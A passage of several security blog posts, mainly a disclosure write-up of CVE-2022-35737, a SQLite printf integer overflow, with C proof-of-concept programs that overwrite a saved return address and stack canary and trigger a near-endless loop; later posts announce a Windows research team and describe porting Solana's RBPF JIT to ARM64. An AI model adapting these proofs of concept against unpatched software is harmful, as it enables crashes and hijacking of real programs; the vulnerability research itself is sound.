        printf("dst: %s\n", dst);
        return 0;
    }
    

    A crash! We seem to have found a culprit: large inputs to sqlite3_snprintf. Thus began a journey down a rabbit hole where we discovered that SQLite does not properly handle large strings in parts of its custom implementations of the printf family of functions. Even further down the rabbit hole, we discovered that a compiler optimization made it easier to exploit the SQLite vulnerability.

    The Vulnerability

    The custom SQLite printf family of functions internally calls the function sqlite3_str_vappendf, which handles string formatting. Large string inputs to the sqlite3_str_vappendf function can cause signed integer overflow when the format substitution type is %q, %Q, or %w.

    sqlite3_str_vappendf scans the input fmt string and formats the variable-sized argument list according to the format substitution types specified in the fmt string. In the case statement for handling the %q, %Q, and %w format specifiers (src/printf.c:L803-850), the function scans the input string for quote characters in order to calculate the correct number of output bytes (lines 824-828) and then copies the input to the output buffer and adds quotation characters as required (lines 842-845). In the snippet below, escarg points to the input string:

     
    case etSQLESCAPE:           /* %q: Escape ' characters */
    case etSQLESCAPE2:          /* %Q: Escape ' and enclose in '...' */
    case etSQLESCAPE3: {        /* %w: Escape " characters */
      int i, j, k, n, isnull;
      int needQuote;
      char ch;
      char q = ((xtype==etSQLESCAPE3)?'"':'\'');   /* Quote character */
      char *escarg;
    
      if( bArgList ){
        escarg = getTextArg(pArgList);
      }else{
        escarg = va_arg(ap,char*);
      }
      isnull = escarg==0;
      if( isnull ) escarg = (xtype==etSQLESCAPE2 ? "NULL" : "(NULL)");
      /* For %q, %Q, and %w, the precision is the number of bytes (or
      ** characters if the ! flags is present) to use from the input.
      ** Because of the extra quoting characters inserted, the number
      ** of output characters may be larger than the precision.
      */
      k = precision;
      for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){   /* line 825 */
        if( ch==q )  n++;
        if( flag_altform2 && (ch&0xc0)==0xc0 ){
        while( (escarg[i+1]&0xc0)==0x80 ){ i++; }   /* line 828 */
        }
      }
      needQuote = !isnull && xtype==etSQLESCAPE2;
      n += i + 3;                                    /* line 832 */
      if( n>etBUFSIZE ){
        bufpt = zExtra = printfTempBuf(pAccum, n);   /* line 834 */
        if( bufpt==0 ) return;
      }else{
        bufpt = buf;                                 /* line 837 */
      }
      j = 0;
      if( needQuote ) bufpt[j++] = q;
      k = i;
      for(i=0; i<k; i++){
        bufpt[j++] = ch = escarg[i];   /* line 843 */
        if( ch==q ) bufpt[j++] = ch;
      }
      if( needQuote ) bufpt[j++] = q;
      bufpt[j] = 0;
      length = j;
      goto adjust_width_for_utf8;
    }
    

    The number of quote characters (int n) and the total number of bytes in the input string (int i) are used to calculate the maximum total bytes required in the output buffer (L832: n+=i+3). This calculation can cause n to overflow to a negative value, for example, when the int type is 32 bits wide and n=0 and i=0x7ffffffe. This is possible when the input string contains 0x7ffffffe ASCII characters with no quote characters.
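
    A minimal demonstration of that wraparound (signed overflow is undefined behavior, but this is what typical two's-complement targets produce):

    #include <stdio.h>

    int main(void) {
        int i = 0x7ffffffe;  /* bytes scanned, no quote characters found */
        int n = 0;           /* count of quote characters */
        n += i + 3;          /* overflows to 0x80000001 in practice */
        printf("n = %d\n", n);  /* typically prints n = -2147483647 */
        return 0;
    }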

    Lines 833-838 are supposed to ensure that a buffer of sufficient size is allocated to receive the formatted bytes of the input string. If the output string size could exceed etBUFSIZE bytes (70 bytes, by default), the program dynamically allocates a buffer of sufficient size to hold the output string (line 834). Otherwise, the program expects the output buffer to be smaller than the stack-allocated buffer of etBUFSIZE bytes, and the small stack-allocated buffer is used instead (line 837). At least i bytes are copied from the input into the destination buffer. When n overflows to a negative value, the stack-allocated buffer is used, even though i can exceed etBUFSIZE, resulting in a stack buffer overflow when the input string is copied to the output buffer (line 843).

    The Exploits

    But can we do more interesting things with this vulnerability than just crash the target program? Of course!

    The input string must be very large to reach the bug condition where n overflows to a negative value at line 832. The challenge is that when the input string is very large, the variable i (which counts the number of bytes in the input string) is also very large, resulting in a lot of data written to the stack and causing the program to crash at line 843. We set out to determine whether it is possible to cause n to overflow on line 832, but to also cause i to stay small and positive at line 843 and thus avoid crashing. We revisit the loop where i is computed, from lines 824 to 830:

    /* For %q, %Q, and %w, the precision is the number of bytes (or
    ** characters if the ! flags is present) to use from the input.
    ** Because of the extra quoting characters inserted, the number
    ** of output characters may be larger than the precision.
    */
    k = precision;
    for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
      if( ch==q )  n++;
      if( flag_altform2 && (ch&0xc0)==0xc0 ){
        while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
      }
    }
    

    The purpose of this loop is to scan the input string (escarg) for quote characters (q), incrementing n each time one is found. If our goal is to cause a controlled stack buffer overflow that does not crash the program, then the loop must terminate with values such that n+=i+3 results in a value less than etBUFSIZE (a macro defined to 70) and i must be a relatively small positive integer that is greater than etBUFSIZE.

    The k and flag_altform2 variables in the loop are related to two features of the SQLite printf functions: optional precision and the optional alternate format flag 2, which are both influenced by the format string. In the example below, including ! in the format string sets flag_altform2=true, and the .80 sets precision=80:

       sqlite3_snprintf(len, buf, "'%!.80q'", src)

    When precision is not set in the format string, it is set by default to -1. Therefore, by default int k=-1, and the loop decrements k with each iteration, so the outer loop can execute 2^32 times before k=0.

    So far in our analysis of CVE-2022-35737, we’ve made few assumptions about the format string passed to the vulnerable function, other than that it contains one of the vulnerable format specifiers (%Q, %q, or %w). To progress further in our exploitation, we need to make one more assumption: that the flag_altform2 is set by providing a ! character in the format string.

    When flag_altform2=true, it is possible to increment i in the inner loop without decrementing k by including unicode characters in the input string. With this in mind, perhaps we can include enough quote characters in the input to set n to a large positive integer, and then cause i to increment in the inner loop until it wraps back around to a small positive integer, and then somehow exit the loop. But how will i behave when it overflows beyond the maximum signed integer value? Will it wrap back to 0, or to a negative value? Is it possible to tell by just looking at the source code? No, it isn’t; this is undefined behavior, so we must inspect the compiled binary to see what choices the compiler made to represent i.

    Divergent Representations in the compiled binary

    We have been working on an Ubuntu 20.04 host with libsqlite3.so version 3.31.1 installed from the APT package manager, so that is the version of the compiled binary that we examine in Binary Ninja:

    Binary Ninja disassembly of the compiled loop from source code lines 824 to 830, where the escarg input string is scanned for quote-characters. [1a] and [1b] indicate source line 825 escarg[i]; … i++. [2a] and [2b] indicate source line 828 escarg[i+1]; … i++.

    At instruction [1a], r10 contains the address of escarg, and rsi is used to index into the buffer to fetch a value from it, where the rsi register was set by sign-extending the 32-bit edx register in the instruction immediately before it. This corresponds to the escarg[i] expression on line 825 of the source code. With each loop iteration, edx is incremented at instruction [1b]. This means that the source code variable i is represented using signed 32-bit integer semantics, and so when i reaches the maximum 32-bit positive signed integer value (0x7fffffff), it will increment to 0x80000000 at [1b], which will be sign-extended into rsi as 0xffffffff80000000 and used to negatively index into escarg.

    However, instruction [2a] tells a different story. Here, r10 still contains the address of escarg, but rax+1 is used to index into the buffer, corresponding to the escarg[i+1] expression on line 828 of the source code, in the inner loop that scans for unicode characters. Instruction [2b] increments rax, but as a 64-bit value—and with no 32-bit sign-extension—before looping back to [2a]. Here, i is represented with unsigned 64-bit integer semantics, so that when i exceeds the maximum signed 32-bit integer value (0x7fffffff), its next memory access is to escarg+0x80000000. We have divergent representations of the same source variable, and two different values can be read from memory for the same value of the source variable i! This discovery prompted us to search for more instances of these “divergent representations,” and we describe this search in a forthcoming blog post.

    Okay, so can we use this compilation quirk to set the conditions for a more interesting exploit of CVE-2022-35737? Turns out, yes.

    Controlling the Saved Return Address

    Here’s a quick recap of the conditions that we are trying to set:

      
    case etSQLESCAPE:           /* %q: Escape ' characters */
    case etSQLESCAPE2:          /* %Q: Escape ' and enclose in '...' */
    case etSQLESCAPE3: {        /* %w: Escape " characters */
      int i, j, k, n, isnull;
      int needQuote;
      char ch;
      char q = ((xtype==etSQLESCAPE3)?'"':'\'');   /* Quote character */
      char *escarg;
    
      if( bArgList ){
        escarg = getTextArg(pArgList);
      }else{
        escarg = va_arg(ap,char*);
      }
      isnull = escarg==0;
      if( isnull ) escarg = (xtype==etSQLESCAPE2 ? "NULL" : "(NULL)");
      /* For %q, %Q, and %w, the precision is the number of bytes (or
      ** characters if the ! flags is present) to use from the input.
      ** Because of the extra quoting characters inserted, the number
      ** of output characters may be larger than the precision.
      */
      k = precision;
      for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){   /* [1] */
        if( ch==q )  n++;
        if( flag_altform2 && (ch&0xc0)==0xc0 ){
          while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
        }
      }
      needQuote = !isnull && xtype==etSQLESCAPE2;
      n += i + 3;   /* [2] */
      if( n>etBUFSIZE ){
        bufpt = zExtra = printfTempBuf(pAccum, n);
        if( bufpt==0 ) return;
      }else{
        bufpt = buf;
      }
      j = 0;
      if( needQuote ) bufpt[j++] = q;
      k = i;
      for(i=0; i<k; i++){   /* [3] */
        bufpt[j++] = ch = escarg[i];
        if( ch==q ) bufpt[j++] = ch;
      }
      if( needQuote ) bufpt[j++] = q;
      bufpt[j] = 0;
      length = j;
      goto adjust_width_for_utf8;
    }
    

    The annotations [1], [2], and [3] in the listing above mark what we want to concentrate on:

    We want the loop at [1] to terminate with values of i and n set so that the calculation at [2] overflows, resulting in a value of n that is negative or less than etBUFSIZE (70) and i set to a relatively small positive integer value that is greater than etBUFSIZE. This would allow the loop at [3] to write beyond the bounds of the stack-allocated bufpt, but without causing the program to crash immediately by writing beyond the stack memory region.

    Consider the string input that contains 0x7fffff00 single-quote (‘) characters, followed by a single 0xc0 byte (a unicode prefix) and then by enough 0x80 bytes to bring the total string length to 0x100000100 bytes (followed by a NULL byte). Let’s call this string string1, and think about what happens when this string is passed to sqlite3_snprintf:

     sqlite3_snprintf(len, buf, "'%!q'", string1)

    (Notice that we’ve changed the format string to allow unicode characters by providing the ! character.)

    When the loop at [1] scans the first 0x7fffff00 bytes of string1, n and i both increment to 0x7fffff00. On the next loop iteration, the program reads the unicode character prefix from the input string and enters the inner loop, where i is represented with 64-bit unsigned semantics. The i variable increments to 0x100000100 before a NULL byte is encountered, causing the inner loop to terminate. At this point in program execution, n=0x7fffff00 and, when downcast to a 32-bit value, i=0x100. If the loop at [1] terminated at this point, the computation n+=i+3 would result in n=0x80000003, which is negative when treated as a signed value. Meanwhile, i is now a small positive integer but is greater than 70 (etBUFSIZE), which would result in a stack buffer overflow when 256 (0x100) bytes are copied into a stack buffer of 70 bytes. This shows progress towards our goal: an extra couple of hundred bytes written to the stack are unlikely to reach the end of the stack memory region, but they are likely to reach interesting data saved on the stack, like saved return addresses and stack canaries. We can determine the exact position of this data on the stack by inspecting the target binary, and then adjust the input string size to control how much data overflows the stack buffer.

    Unfortunately, this approach will not work as-is, because the loop at [1] does not terminate at the point described above. Because of the divergent representations of the i variable, escarg[i+1] at line 828 (inner loop) will represent i as 0x100000100 and read a NULL byte at the end of our large string, but escarg[i] at line 825 (outer loop) will represent i as 0x100 and instead read a single-quote character (') from near the beginning of the input string. As a result, the loop exit condition is not met and the loop continues, with i=0x100 and n=0x7fffff00. Notably, by this point k has decremented 0x7fffff00 times. Because there is no NULL byte in the input string in the first 2^31 bytes, escarg[i] will never read a NULL byte at line 825, and we have to instead depend on k decrementing to 0 in order to exit the loop at [1]. We can accomplish this by allowing the outer loop to continue incrementing until k has decremented all the way to 0, but with specially calculated values for n and i.

    With this thought in mind, we can take the same approach described above, which is to increment n to a very large positive value by supplying single-quote characters in the input string, and to then set i to a small positive value by supplying unicode characters to increment i using 64-bit unsigned semantics. We calculate our values by accounting for the fact that the outer loop will increment 2^32 times because k needs to decrement from 0xffffffff to 0.

    Our proof of concept uses this insight to control the number of bytes that overflow the stack-allocated buffer and overwrite the saved return address and stack canary:

    #include <assert.h>
    #include <stdio.h>
    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>
    
    // Offsets relative to sqlite3_str_vappendf stack frame base. Calculated using
    // the version of libsqlite3.so.0.8.6 provided by apt on Ubuntu 20.04.
    #define RETADDR_OFFSET  0
    #define CANARY_OFFSET   0x40
    #define BUF_OFFSET      0x88
    #define CANARY          0xbaadd00dbaadd00dull
    #define ROPGADGET       0xdeadbeefdeadbeefull
    #define NGADGETS        1
    
    struct payload {
        uint8_t padding1[BUF_OFFSET-CANARY_OFFSET];
        uint64_t canary;
        uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8];
        uint64_t ropchain[NGADGETS];
    }__attribute__((packed, aligned(1)));
    
    int main(int argc, char *argv[]) {
        char dst[256];
        struct payload p;
        memset(p.padding1, 'a', sizeof(p.padding1));
        p.canary = CANARY;
        memset(p.padding2, 'b', sizeof(p.padding2));
        p.ropchain[0] = ROPGADGET;
    
        size_t target_n = 0x80000000;
        assert(sizeof(p) + 3 <= target_n);
        size_t n = target_n - sizeof(p) - 3;
        size_t target_i = 0x100000000 + (sizeof(p) / 2);
    
        char *src = calloc(1, target_i);
        if (!src) { printf("bad allocation\n"); return -1; }
    
        size_t cur = 0;
        memcpy(src, &p, sizeof(p));
        cur += sizeof(p);
        memset(src+cur, '\'', n/2);
        cur += n/2;
        assert(cur < 0x7ffffffeul);
        memset(src+cur, 'c', 0x7ffffffeul-cur);
        cur += 0x7ffffffeul-cur;
        src[cur] = '\xc0';
        cur++;
        memset(src+cur, '\x80', target_i - cur);
        cur = target_i;
        src[cur-1] = '\0';
    
        sqlite3_snprintf((int) 256, dst, "'%!q'", src);
        free(src);
        return 0;
    }
    

    This proof of concept causes the program to crash, but with a SIGABRT rather than a SIGSEGV. This implies that a stack canary was overwritten and that the vulnerable function tried to return, in contrast to the earlier proof of concept, which crashed before ever reaching the function return.

    To confirm that we have successfully controlled the saved return address and stack canary, we can use GDB to view the stack frame before the vulnerable function returns:

    Executing the proof of concept in a debugger shows that the saved return address is set to 0xdeadbeefdeadbeef.

    Note that in a non-contrived scenario, a real stack canary will contain a NULL byte, which would defeat the proof of concept above because the NULL byte will cause the string-scanning loop to terminate before the entire payload is copied over the return address. Clever exploitation techniques or specific format string conditions may allow an attacker to bypass this, but our intention is to show that the saved return address can be overwritten.

    Looping (Nearly) Forever

    We took our exploitation one step further and developed a proof of concept that uses the divergent representations of the i variable to cause loop [1] to iterate nearly infinitely by incrementing i 2^64 times, which effectively takes forever. This is achieved by causing the inner loop to increment i 2^32 times on every iteration of loop [1], which will also increment 2^32 times. The interesting part of this proof of concept is that it doesn’t actually reach the vulnerable integer overflow computation on line 832, but uses only the undefined behavior that results from allowing string inputs larger than what can be represented with 32-bit integers. All that is required is to fill a buffer of 0x100000000 bytes with unicode prefix characters (a single byte of 0xc0 followed by bytes of 0x80), and the loop at [1] will never terminate:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>
    #include <unistd.h>
    
    int main(int argc, char *argv[]) {
        size_t src_buf_size = 0x100000001;
    
        char *src = calloc(1, src_buf_size);
        if (!src) {
            printf("bad allocation\n");
            return -1;
        }
        src[0] = '\xc0';
        memset(src+1, '\x80',  0xffffffff);
    
        char dst[256];
        sqlite3_snprintf(256, dst, "'%!q'", src);
        free(src);
        return 0;
    }
    

    We showed that CVE-2022-35737 is exploitable when large string inputs are passed to the SQLite implementations of the printf functions and when the format string contains the %Q, %q, or %w format substitution types. This is enough to cause the program to crash. We also showed that if the format string additionally allows for unicode characters by providing the ! character, then it is possible to overwrite the saved return address and to cause the program to loop (nearly) infinitely.

    But, SQLite is well-tested, right?

    SQLite is extensively tested with 100% branch test coverage. We discovered this vulnerability despite the tests, which raises the question: how did the tests miss it?

    SQLite maintains an internal memory limit of 1GB, so the vulnerability is not reachable in the SQLite program itself. The problem is “defined away” by the notion that SQLite does not support the large strings necessary to trigger this vulnerability.

    However, the C APIs provided by SQLite do not enforce that their inputs adhere to the memory limit, and applications are able to call the vulnerable functions directly. The notion that large strings are unsupported by SQLite is not communicated by the API, so application developers cannot know that they need to enforce input size limits on these functions. When this code was first written, most processors had 32-bit registers and 4GB of addressable memory, so allocating 1GB strings as input was impractical. Now that 64-bit processors are quite common, allocating such large strings is feasible and the vulnerable conditions are reachable.

    Unfortunately, this vulnerability is an example of one where extensive branch test coverage does not help, because no new code paths are introduced. 100% branch coverage guarantees that every branch has been executed, but not how many times. This vulnerability is the result of invalid data that causes code to execute billions of times more than it should.

    The thoroughness of SQLite’s tests is remarkable — the discovery of this vulnerability should not be taken as a knock on the robustness of the tests. In fact, we wish more projects put as much emphasis on testing as SQLite does. Nonetheless, this bug is evidence that even the best-tested software can have exploitable bugs.

    Conclusion

    Not every system or application that uses the SQLite printf functions is vulnerable. For those that are, CVE-2022-35737 is a critical vulnerability that can allow attackers to crash or control programs. The bug has been particularly interesting to analyze, for a few reasons. For one, the inputs required to reach the bug condition are very large, which makes it difficult for traditional fuzzers to reach, and so techniques like static and manual analysis were required to find it. For another, it’s a bug that may not have seemed like an error at the time that it was written (dating back to 2000 in the SQLite source code) when systems were primarily 32-bit architectures. And—most interestingly to us at Trail of Bits—its exploitation was made easier by the discovered “divergent representations” of the same source variable, which we explore further in a separate blog post.

    I’d like to thank my mentor, Peter Goodman, for his expert guidance throughout my summer internship with Trail of Bits. I’d also like to thank Nick Selby for his help in navigating the responsible disclosure process, and all members of the Trail of Bits team who assisted in advising and writing this blog post.

    Coordinated disclosure

    July 14, 2022: Reported vulnerability to the Computer Emergency Response Team (CERT) Coordination Center.
    July 15, 2022: CERT/CC reported vulnerability to SQLite maintainers.
    July 18, 2022: SQLite maintainers confirmed the vulnerability and fixed it in source code.
    July 21, 2022: SQLite maintainers released SQLite version 3.39.2 with fix.

    We would like to thank the teams at SQLite and CERT/CC for working swiftly with us to address these issues.

    We do Windows now

    At Trail of Bits, we pride ourselves on building tools that everyone can use to help improve the security ecosystem. Given how ingrained Microsoft technologies are in a large portion of our work — binary analysis, cryptography, cloud security — our teams’ research and development has resulted in numerous tool releases for the public to incorporate into their own security strategies.

    To build upon these efforts, we have now established a dedicated team, filled with some of the world’s foremost Windows security experts, that will incubate new research projects and execute engineering initiatives focused on the security of one of the world’s most prevalent operating systems.

    The team will leverage the company’s existing relationships in both the public and private sector to work on various Microsoft technologies and initiatives. As Trail of Bits has helped secure some of the world’s most targeted organizations and devices, this team will bring high-end security research together with a real-world attacker mentality to discover, analyze, and solve security issues in one of the world’s most popular operating systems.

    The team is composed of the following members:

    • Aaron LeMasters, a principal security engineer, is a technologist and researcher with over 16 years of experience in malware analysis, reverse engineering, Windows internals and kernel driver development. In addition to several issued and provisional patents, he has numerous publications on various research topics and has spoken at renowned conferences such as Blackhat USA, No Such Con, SyScan and Brucon.
    • Yarden Shafir, a senior security researcher, is a world-renowned expert on Windows internals and security tools. She teaches security courses on advanced Windows topics with Winsider Seminars and Solutions. Previously she worked at CrowdStrike and SentinelOne, researching and developing EDR features. Outside of her primary work duties, she has spoken extensively on various topics, such as CET internals, kernel exploitation techniques, extension host hooking and kernel exploit mitigations.
    • Adam Meily, a senior security research engineer, previously architected an agentless proactive malware hunting and incident response framework that scaled to over 500,000 systems across a wide variety of Windows versions, configurations, and architectures. He has also built hardened Windows-based memory forensic and analysis tools to securely run critical processes on contested systems and identify advanced attacks, indicators of compromise, and deviations from baseline configurations.

    The team will focus on the security boundaries of three logical architectural layers: operating systems, virtualization, and hardware and architecture support. Initial research will cover hardware and firmware microarchitectures to the operating system and related system libraries, with plans to expand to other software ecosystems in the future. The work will result in outputs similar to other projects conducted by Trail of Bits: client assessment reports, conference presentations, blog posts and other publications, and open-source tools posted on GitHub.

    The new effort will build upon years of Windows-related work Trail of Bits has conducted, such as a project with Facebook that resulted in the first Windows platform support for the osquery open-source endpoint agent. An extremely popular operating system analysis tool, osquery allows security teams to build customized queries needed to track security-related data.

    Other Windows-based security projects include a tool to verify Authenticode signatures on Windows executables, a Rust-based sandbox for Windows Defender, and training code that allows researchers to study bugs and prevent them from turning into exploits.

    Any organizations interested in working with this team can contact Trail of Bits to inquire about future projects. You can keep up with our latest news and announcements on Twitter (@trailofbits) and explore our public repositories on GitHub.

    Porting the Solana eBPF JIT compiler to ARM64

    By Andrew Haberlandt 

    During my summer internship at Trail of Bits, I worked on the fork of the RBPF JIT compiler that is used to execute Solana smart contracts. The RBPF JIT compiler plays a critical role on the Solana blockchain, as it facilitates the execution of contracts on validator nodes by default.

    Before my work on this project, RBPF supported JIT mode only on x86 hosts. An increasing number of developers are using ARM64 machines but are unable to run their tests in JIT mode. My primary goal was to add support in RBPF for the ARM64 architecture, mainly by updating the register map, calling convention, and all of the subroutines and instruction translations to emit ARM64 instructions. I also aimed to implement support for Windows in the RBPF x86 JIT compiler.

    The work is live and can be found in two pull requests on Solana’s GitHub page. However, a caveat: it is currently behind a feature-gate ('jit-aarch64-not-safe-for-production') and is not ready for production until it has received a thorough peer review.

    Background

    Smart contracts that run on the Solana blockchain are compiled from Rust (or C, if you like bugs) to eBPF, an extended version of the Berkeley Packet Filter. The eBPF virtual machine’s architecture is fairly simple, with a minimal set of 32- and 64-bit integer operations (including multiplication and division) and memory and control flow instructions. BPF programs have their own address space, which in RBPF consists of code, stack, heap, and input data sections located at fixed addresses.

    The version of BPF supported by RBPF was designed to work with programs compiled using the LLVM BPF back end. The official Linux documentation for eBPF shows that there are a few differences between RBPF and eBPF—most notably, RBPF has to support an indirect call (callx) instruction.

    Furthermore, RBPF’s “verifier” is much simpler than that of eBPF. In the Linux kernel, the eBPF verifier validates certain safety properties of BPF programs before JITing and executing them. In RBPF, Solana programs pass through a much simpler verifier before being JITed. The verifier checks for instructions that try to divide by a constant zero, jump to a clearly invalid address, or read or write to an invalid register, among other errors. Notably, the RBPF verifier does not perform any CFG analysis or attempt to track the range of values held by each register. The full list of errors that the RBPF verifier checks for can be found here.

    RBPF internals

    The source code to binary translation stages

    RBPF verifies then translates an entire program, instruction by instruction, into the target architecture before finally calling into the emitted code. This involves an eBPF instruction decoder and a partial instruction encoder for the target architecture (before the summer of 2022, only x86 was supported). RBPF also provides an interpreter capable of executing eBPF Solana programs, but the JITed translations are the default for performance reasons.

    Memory and address translation

    BPF programs are executed in their own memory space, and there is a mapping between this address space and the host address space. Memory regions are set up (using mmap and mprotect) for each program that is to be executed; the BPF code, stack, heap, and input data have their own regions, located at fixed addresses in BPF address space. The locations of these mappings in the host address space are not fixed.

    The memory layout of the VM environment

    To handle eBPF load and store instructions, the address must first be translated into the host address space. RBPF includes a translate_memory_address assembly routine, which is responsible for looking up the region that contains the address being accessed and for translating the BPF address into a host address. This translation logic is invoked every time a BPF load or store instruction is executed, as shown in the example instruction translations later in this post.
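
    Conceptually, the lookup works something like the following C sketch (the real routine is emitted machine code with its own register conventions; the names and structure here are illustrative only):

    #include <stdint.h>

    typedef struct {
        uint64_t vm_addr;   /* fixed base address in BPF address space */
        uint64_t len;       /* region length */
        uint64_t host_addr; /* where mmap placed the region on the host */
    } MemoryRegion;

    /* Returns the host address, or 0 to signal an access violation. */
    uint64_t translate(const MemoryRegion *regions, int n_regions,
                       uint64_t vm_addr, uint64_t access_len) {
        for (int i = 0; i < n_regions; i++) {
            const MemoryRegion *r = &regions[i];
            if (vm_addr >= r->vm_addr &&
                vm_addr - r->vm_addr + access_len <= r->len)
                return r->host_addr + (vm_addr - r->vm_addr);
        }
        return 0; /* the real code raises an access-violation error */
    }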

    Register allocation

    BPF has 11 registers (10 general purpose registers and the frame pointer), each of which maps to a distinct register in the host architecture. On x86_64, which has 16 registers, four of the remaining registers are used for specific purposes (RSP cannot be repurposed, since the original host call stack will be maintained), described below:

    // Special registers:
    //     ARGUMENT_REGISTERS[0]  RDI  BPF program counter limit (used by instruction meter)
    // CALLER_SAVED_REGISTERS[8]  R11  Scratch register
    // CALLER_SAVED_REGISTERS[7]  R10  Constant pointer to JitProgramArgument (also scratch register for exception handling)
    // CALLEE_SAVED_REGISTERS[0]  RBP  Constant pointer to initial RSP - 8
    
    

    Source: Line 224 of jit.rs in solana-labs

    Instruction translation

    Translating instructions in RBPF is a fairly straightforward process:

    • Registers in the eBPF virtual machine are mapped to a unique register in the host architecture.
    • Each opcode is translated to one or more instructions in the host architecture (via this large match statement).

    Two example translations are displayed below:

    Example instruction translations

    RBPF includes subroutines that are emitted once to handle shared logic (such as address translation, which is performed by translating the load instruction above). Sometimes these subroutines include calls back into Rust code to handle more complicated operations (e.g., tracing, “syscalls”) or to update certain externally visible states (e.g., the instruction meter). There is also a prologue (e.g., to set up the stack, handle exceptions, etc.) and an epilogue (e.g., to handle cases in which the execution reaches the last instruction in the program and does not exit, which is normally done by calling an exit function).

    The memory layout of the JIT code region

    Control flow

    Every BPF instruction is a valid target address for a jump or call. eBPF instructions are 8 bytes, with one exception: load double word (LDDW), which is 16 bytes. This means that, with this one exception, every 8-byte boundary in the BPF code address space is a valid jump target.

    Relative jumps can always be resolved before runtime; they can either be resolved at translation-time (for backward jumps) or be ‘fixed up’ after all instructions have been emitted (for forward jumps). Indirect calls, however, must be resolved at runtime. Therefore, RBPF keeps a mapping from the instruction index to the host address so that the location of the already-translated target instruction can be looked up when an indirect call occurs.
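
    A rough sketch of that lookup (illustrative C rather than RBPF’s actual Rust data structures):

    #include <stddef.h>
    #include <stdint.h>

    /* Maps a BPF instruction index (target address / 8) to the host
     * address of its already-emitted translation. */
    uint64_t lookup_call_target(const uint64_t *index_to_host,
                                size_t n_insns, uint64_t bpf_target) {
        uint64_t idx = bpf_target / 8;  /* 8-byte instruction slots */
        if (idx >= n_insns)
            return 0;                   /* invalid target: raise an error */
        return index_to_host[idx];
    }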

    The instruction meter

    Solana programs are designed to run with a specific ‘compute budget’, which is essentially the number of eBPF instructions that can be executed before the program exits. In order to enforce this limit (on potentially non-terminating programs), the JIT compiler emits additional logic to track the number of instructions that have been executed. The instruction meter is best described in this comment, but it can be summarized as follows:

    • The source of each branch is instrumented to account for the instructions that were executed in the linear sequence since the last update and to record the branch target (the beginning of the next linear sequence of instructions to execute).
    • If a conditional branch is not actually taken, the updates to the instruction meter are undone.
    • Additional instruction meter checks are inserted at certain thresholds in long linear sequences of instructions.

    The instruction meter has been the source of multiple bugs in the past (e.g., check out pull request 203 and pull request 263).

    Calls and “syscalls”

    For regular eBPF calls within the same program, RBPF keeps a separate stack from the host (currently using fixed-size stack frames), tracks the current call depth, and exits with an error if the call depth exceeds its budget. Solana programs in particular also need to invoke other contracts and interact with certain blockchain states. RBPF has a mechanism called “syscalls” by which eBPF programs can make calls into Solana-specific helper functions implemented in Rust.

    Exceptions

    The JIT compiler may exit early if it encounters a number of unrecoverable runtime conditions (such as division by zero or invalid memory access). Since the verifier does not attempt to track register contents, most exceptions are caught at runtime rather than at verification time. Exception handlers are designed to record the current exception information into an EbpfError enum and then proceed to the exit subroutine (which returns back into Rust code).

    Security mitigations

    RBPF contains a few features that fall under the category of “machine code diversification” and serve to somewhat harden the JIT compiler against exploitation. Two of the features (introduced last year) are constant sanitization and instruction address randomization.

    Constant sanitization changes how immediates are loaded into registers in the emitted code. Rather than emitting a typical x86 MOVABS instruction containing the unmodified bytes of the immediate, the JIT compiler emits the immediate offset by a randomly generated key. At runtime, a subsequent instruction fetches this key from memory and adds it back so that the destination register contains the originally intended immediate.

    Instruction address randomization adds no-op instructions at random locations throughout the emitted code. Both of these mitigations are intended to make code-reuse attacks more difficult.
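    The arithmetic behind constant sanitization is simple; here is a minimal sketch with hypothetical function names (RBPF performs these steps in emitted machine code, with the key fetched from memory at runtime):

    // Embed (imm - key) in the emitted code instead of imm itself, so the
    // raw immediate bytes never appear in the executable region.
    fn sanitize_immediate(imm: u64, key: u64) -> u64 {
        imm.wrapping_sub(key)
    }

    // At runtime, the emitted code adds the key back to recover imm.
    fn desanitize_at_runtime(embedded: u64, key: u64) -> u64 {
        embedded.wrapping_add(key)
    }

    #[test]
    fn round_trip() {
        let (imm, key) = (0xdead_beef_u64, 0x1234_5678_9abc_def0_u64);
        assert_eq!(desanitize_at_runtime(sanitize_immediate(imm, key), key), imm);
    }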

    Porting RBPF to ARM64

    Calling convention and register allocation

    The JIT compiler needs to be able to call into Rust code, which follows the host’s calling convention. Luckily, most platforms follow ARM’s standard calling convention. Both Apple and Microsoft publish their own ABI documentation, but they mostly follow the standard ARM64 documentation. I tested my implementation on an M1 Mac running macOS and on an emulated ARM64 virtual machine in QEMU.

    Note that ARM64’s additional registers mean that even after each eBPF register is mapped to a host register, a substantial number of host registers are left unused. I used some of these extra registers to hold additional “scratch” values during the translation of more complex instructions. Extra scratch values come in handy because only load and store instructions can access memory on ARM64, which tends to produce longer translations with more temporary values.

    Instruction-by-instruction translation

    I wrote translations to ARM64 for each of the eBPF instructions, modeled closely after their x86 translations. The following is an example of the existing x86 and the new translated ARM64 code for two variants of the eBPF ADD instruction.

    The existing x86 code

    The translated ARM64 code

    Note that ARM64’s fixed instruction size of 4 bytes means that you can’t encode every 32-bit immediate in a single instruction, and ARM64 ALU instructions can encode only a very limited range of immediate values. So some simple eBPF instructions require multiple ARM64 instructions (e.g., emit_load_immediate64 may emit more than one instruction to move the immediate into the scratch register), even if they require only a single x86 instruction.
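    For instance, a 64-bit immediate can be materialized from 16-bit chunks with one MOVZ followed by up to three MOVKs. The following is a hypothetical text-emitting sketch of that pattern (RBPF emits binary instruction encodings, not assembly text):

    // MOVZ writes one 16-bit chunk and zeroes the remaining bits; MOVK
    // then patches in each remaining non-zero 16-bit chunk.
    fn emit_load_immediate64(emit: &mut dyn FnMut(String), reg: &str, imm: u64) {
        emit(format!("movz {}, #{:#x}", reg, imm & 0xffff));
        for shift in [16u32, 32, 48] {
            let chunk = (imm >> shift) & 0xffff;
            if chunk != 0 {
                emit(format!("movk {}, #{:#x}, lsl #{}", reg, chunk, shift));
            }
        }
    }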

    Some surprises

    The ARM64 ABI requires the stack to be 16-byte aligned at the time of any SP-relative access; this alignment is supposed to be enforced by hardware. QEMU does not enforce it by default, but the Apple M1 does.
